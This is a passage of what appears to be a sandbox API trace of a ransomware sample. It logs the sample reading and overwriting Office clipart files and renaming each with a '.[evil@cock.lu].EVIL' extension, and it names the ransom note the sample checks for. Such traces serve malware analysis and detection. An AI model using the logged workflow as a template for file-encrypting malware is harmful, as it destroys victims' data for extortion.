0x7ffc020ee2a0 [0160.981] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0160.981] __uncaught_exception () returned 0x84b1160800 [0160.981] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0160.994] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02093_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02093_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02093_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02093_.wmf.[evil@cock.lu].evil")) returned 1 [0160.995] ??_V@YAXPEAX@Z () returned 0x1 [0160.998] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02093_.WMF", dwFileAttributes=0x200) returned 0 [0160.999] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0160.999] wcsstr (_Str="NA02124_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0160.999] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02124_.WMF") returned 69 [0160.999] wcscmp (_String1="NA02124_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0160.999] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="NA02124_.WMF") returned 0x0 [0160.999] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02124_.WMF") returned 0x45 [0160.999] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02124_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02124_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0161.002] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2b040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1fe8, lpOverlapped=0x0) returned 1 [0161.014] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0161.014] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0161.014] _errno () returned 0x84b1160840 [0161.014] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0161.014] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2b040*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x2000, lpOverlapped=0x0) returned 1 [0161.014] CloseHandle (hObject=0x1a8) returned 1 [0161.014] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02124_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0161.014] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0161.014] __uncaught_exception () returned 0x84b1160800 [0161.014] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0161.015] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02124_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02124_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02124_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02124_.wmf.[evil@cock.lu].evil")) returned 1 [0161.016] ??_V@YAXPEAX@Z () returned 0x1 [0161.019] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02124_.WMF", dwFileAttributes=0x200) returned 0 [0161.020] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0161.020] wcsstr (_Str="NA02125_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0161.020] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02125_.WMF") returned 69 [0161.020] wcscmp (_String1="NA02125_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0161.020] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="NA02125_.WMF") returned 0x0 [0161.020] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02125_.WMF") returned 0x45 [0161.020] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02125_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02125_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0161.023] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e26040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e26040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x4816, lpOverlapped=0x0) returned 1 [0161.036] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0161.036] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0161.036] _errno () returned 0x84b1160840 [0161.036] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0161.036] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e26040*, nNumberOfBytesToWrite=0x4820, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e26040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x4820, lpOverlapped=0x0) returned 1 [0161.036] CloseHandle (hObject=0x1a8) returned 1 [0161.036] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02125_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0161.036] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0161.036] __uncaught_exception () returned 0x84b1160800 [0161.036] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0161.037] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02125_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02125_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02125_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02125_.wmf.[evil@cock.lu].evil")) returned 1 [0161.038] ??_V@YAXPEAX@Z () returned 0x1 [0161.041] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02125_.WMF", dwFileAttributes=0x200) returned 0 [0161.041] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0161.042] wcsstr (_Str="NA02126_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0161.042] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02126_.WMF") returned 69 [0161.042] wcscmp (_String1="NA02126_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0161.042] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="NA02126_.WMF") returned 0x0 [0161.042] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02126_.WMF") returned 0x45 [0161.042] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02126_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02126_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0161.044] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b303f040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x7c50, lpOverlapped=0x0) returned 1 [0161.047] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0161.047] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0161.047] _errno () returned 0x84b1160840 [0161.047] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0161.047] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b303f040*, nNumberOfBytesToWrite=0x7c60, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x7c60, lpOverlapped=0x0) returned 1 [0161.047] CloseHandle (hObject=0x1a8) returned 1 [0161.048] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02126_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0161.048] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0161.048] __uncaught_exception () returned 0x84b1160800 [0161.048] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0161.048] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02126_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02126_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02126_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02126_.wmf.[evil@cock.lu].evil")) returned 1 [0161.049] ??_V@YAXPEAX@Z () returned 0x1 [0161.053] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02126_.WMF", dwFileAttributes=0x200) returned 0 [0161.053] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0161.053] wcsstr (_Str="NA02127_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0161.053] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02127_.WMF") returned 69 [0161.053] wcscmp (_String1="NA02127_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0161.053] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="NA02127_.WMF") returned 0x0 [0161.053] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02127_.WMF") returned 0x45 [0161.053] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02127_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02127_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0161.056] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b303f040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xfe4, lpOverlapped=0x0) returned 1 [0161.059] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0161.059] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0161.059] _errno () returned 0x84b1160840 [0161.059] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0161.059] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b303f040*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1000, lpOverlapped=0x0) returned 1 [0161.059] CloseHandle (hObject=0x1a8) returned 1 [0161.060] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02127_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0161.060] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0161.060] __uncaught_exception () returned 0x84b1160800 [0161.060] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0161.060] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02127_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02127_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02127_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02127_.wmf.[evil@cock.lu].evil")) returned 1 [0161.061] ??_V@YAXPEAX@Z () returned 0x1 [0161.065] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02127_.WMF", dwFileAttributes=0x200) returned 0 [0161.065] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0161.065] wcsstr (_Str="NA02262_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0161.065] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02262_.WMF") returned 69 [0161.065] wcscmp (_String1="NA02262_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0161.065] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="NA02262_.WMF") returned 0x0 [0161.065] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02262_.WMF") returned 0x45 [0161.065] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02262_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02262_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0161.067] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xd00, lpOverlapped=0x0) returned 1 [0161.071] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0161.071] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0161.071] _errno () returned 0x84b1160840 [0161.071] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0161.071] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040*, nNumberOfBytesToWrite=0xd20, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xd20, lpOverlapped=0x0) returned 1 [0161.071] CloseHandle (hObject=0x1a8) returned 1 [0161.071] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02262_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0161.071] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0161.071] __uncaught_exception () returned 0x84b1160800 [0161.071] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0161.072] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02262_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02262_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02262_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02262_.wmf.[evil@cock.lu].evil")) returned 1 [0161.073] ??_V@YAXPEAX@Z () returned 0x1 [0161.076] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02262_.WMF", dwFileAttributes=0x200) returned 0 [0161.076] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0161.076] wcsstr (_Str="NA02264_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0161.076] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02264_.WMF") returned 69 [0161.076] wcscmp (_String1="NA02264_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0161.076] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="NA02264_.WMF") returned 0x0 [0161.076] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02264_.WMF") returned 0x45 [0161.077] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02264_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02264_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0161.079] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x8e0, lpOverlapped=0x0) returned 1 [0161.095] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0161.095] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0161.095] _errno () returned 0x84b1160840 [0161.096] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0161.097] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040*, nNumberOfBytesToWrite=0x900, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x900, lpOverlapped=0x0) returned 1 [0161.098] CloseHandle (hObject=0x1a8) returned 1 [0161.099] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02264_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0161.100] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0161.101] __uncaught_exception () returned 0x84b1160800 [0161.101] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0161.102] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02264_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02264_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02264_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02264_.wmf.[evil@cock.lu].evil")) returned 1 [0161.103] ??_V@YAXPEAX@Z () returned 0x1 [0161.106] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02264_.WMF", dwFileAttributes=0x200) returned 0 [0161.107] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0161.107] wcsstr (_Str="NA02356_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0161.107] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02356_.WMF") returned 69 [0161.107] wcscmp (_String1="NA02356_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0161.107] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="NA02356_.WMF") returned 0x0 [0161.107] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02356_.WMF") returned 0x45 [0161.107] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02356_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02356_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0161.118] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e22040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xe14, lpOverlapped=0x0) returned 1 [0161.121] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0161.121] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0161.121] _errno () returned 0x84b1160840 [0161.121] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0161.121] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e22040*, nNumberOfBytesToWrite=0xe20, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xe20, lpOverlapped=0x0) returned 1 [0161.121] CloseHandle (hObject=0x1a8) returned 1 [0161.121] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02356_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0161.122] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0161.122] __uncaught_exception () returned 0x84b1160800 [0161.122] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0161.122] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02356_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02356_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02356_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02356_.wmf.[evil@cock.lu].evil")) returned 1 [0161.123] ??_V@YAXPEAX@Z () returned 0x1 [0161.127] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02356_.WMF", dwFileAttributes=0x200) returned 0 [0161.127] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0161.127] wcsstr (_Str="NA02361_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0161.127] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02361_.WMF") returned 69 [0161.127] wcscmp (_String1="NA02361_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0161.127] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="NA02361_.WMF") returned 0x0 [0161.127] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02361_.WMF") returned 0x45 [0161.127] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02361_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02361_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0161.129] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e28040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x17c4, lpOverlapped=0x0) returned 1 [0161.132] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0161.132] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0161.132] _errno () returned 0x84b1160840 [0161.132] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0161.132] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e28040*, nNumberOfBytesToWrite=0x17e0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x17e0, lpOverlapped=0x0) returned 1 [0161.132] CloseHandle (hObject=0x1a8) returned 1 [0161.133] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02361_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0161.133] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0161.133] __uncaught_exception () returned 0x84b1160800 [0161.133] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0161.133] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02361_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02361_.wmf"), lpNewFileName="C:\\\\Program 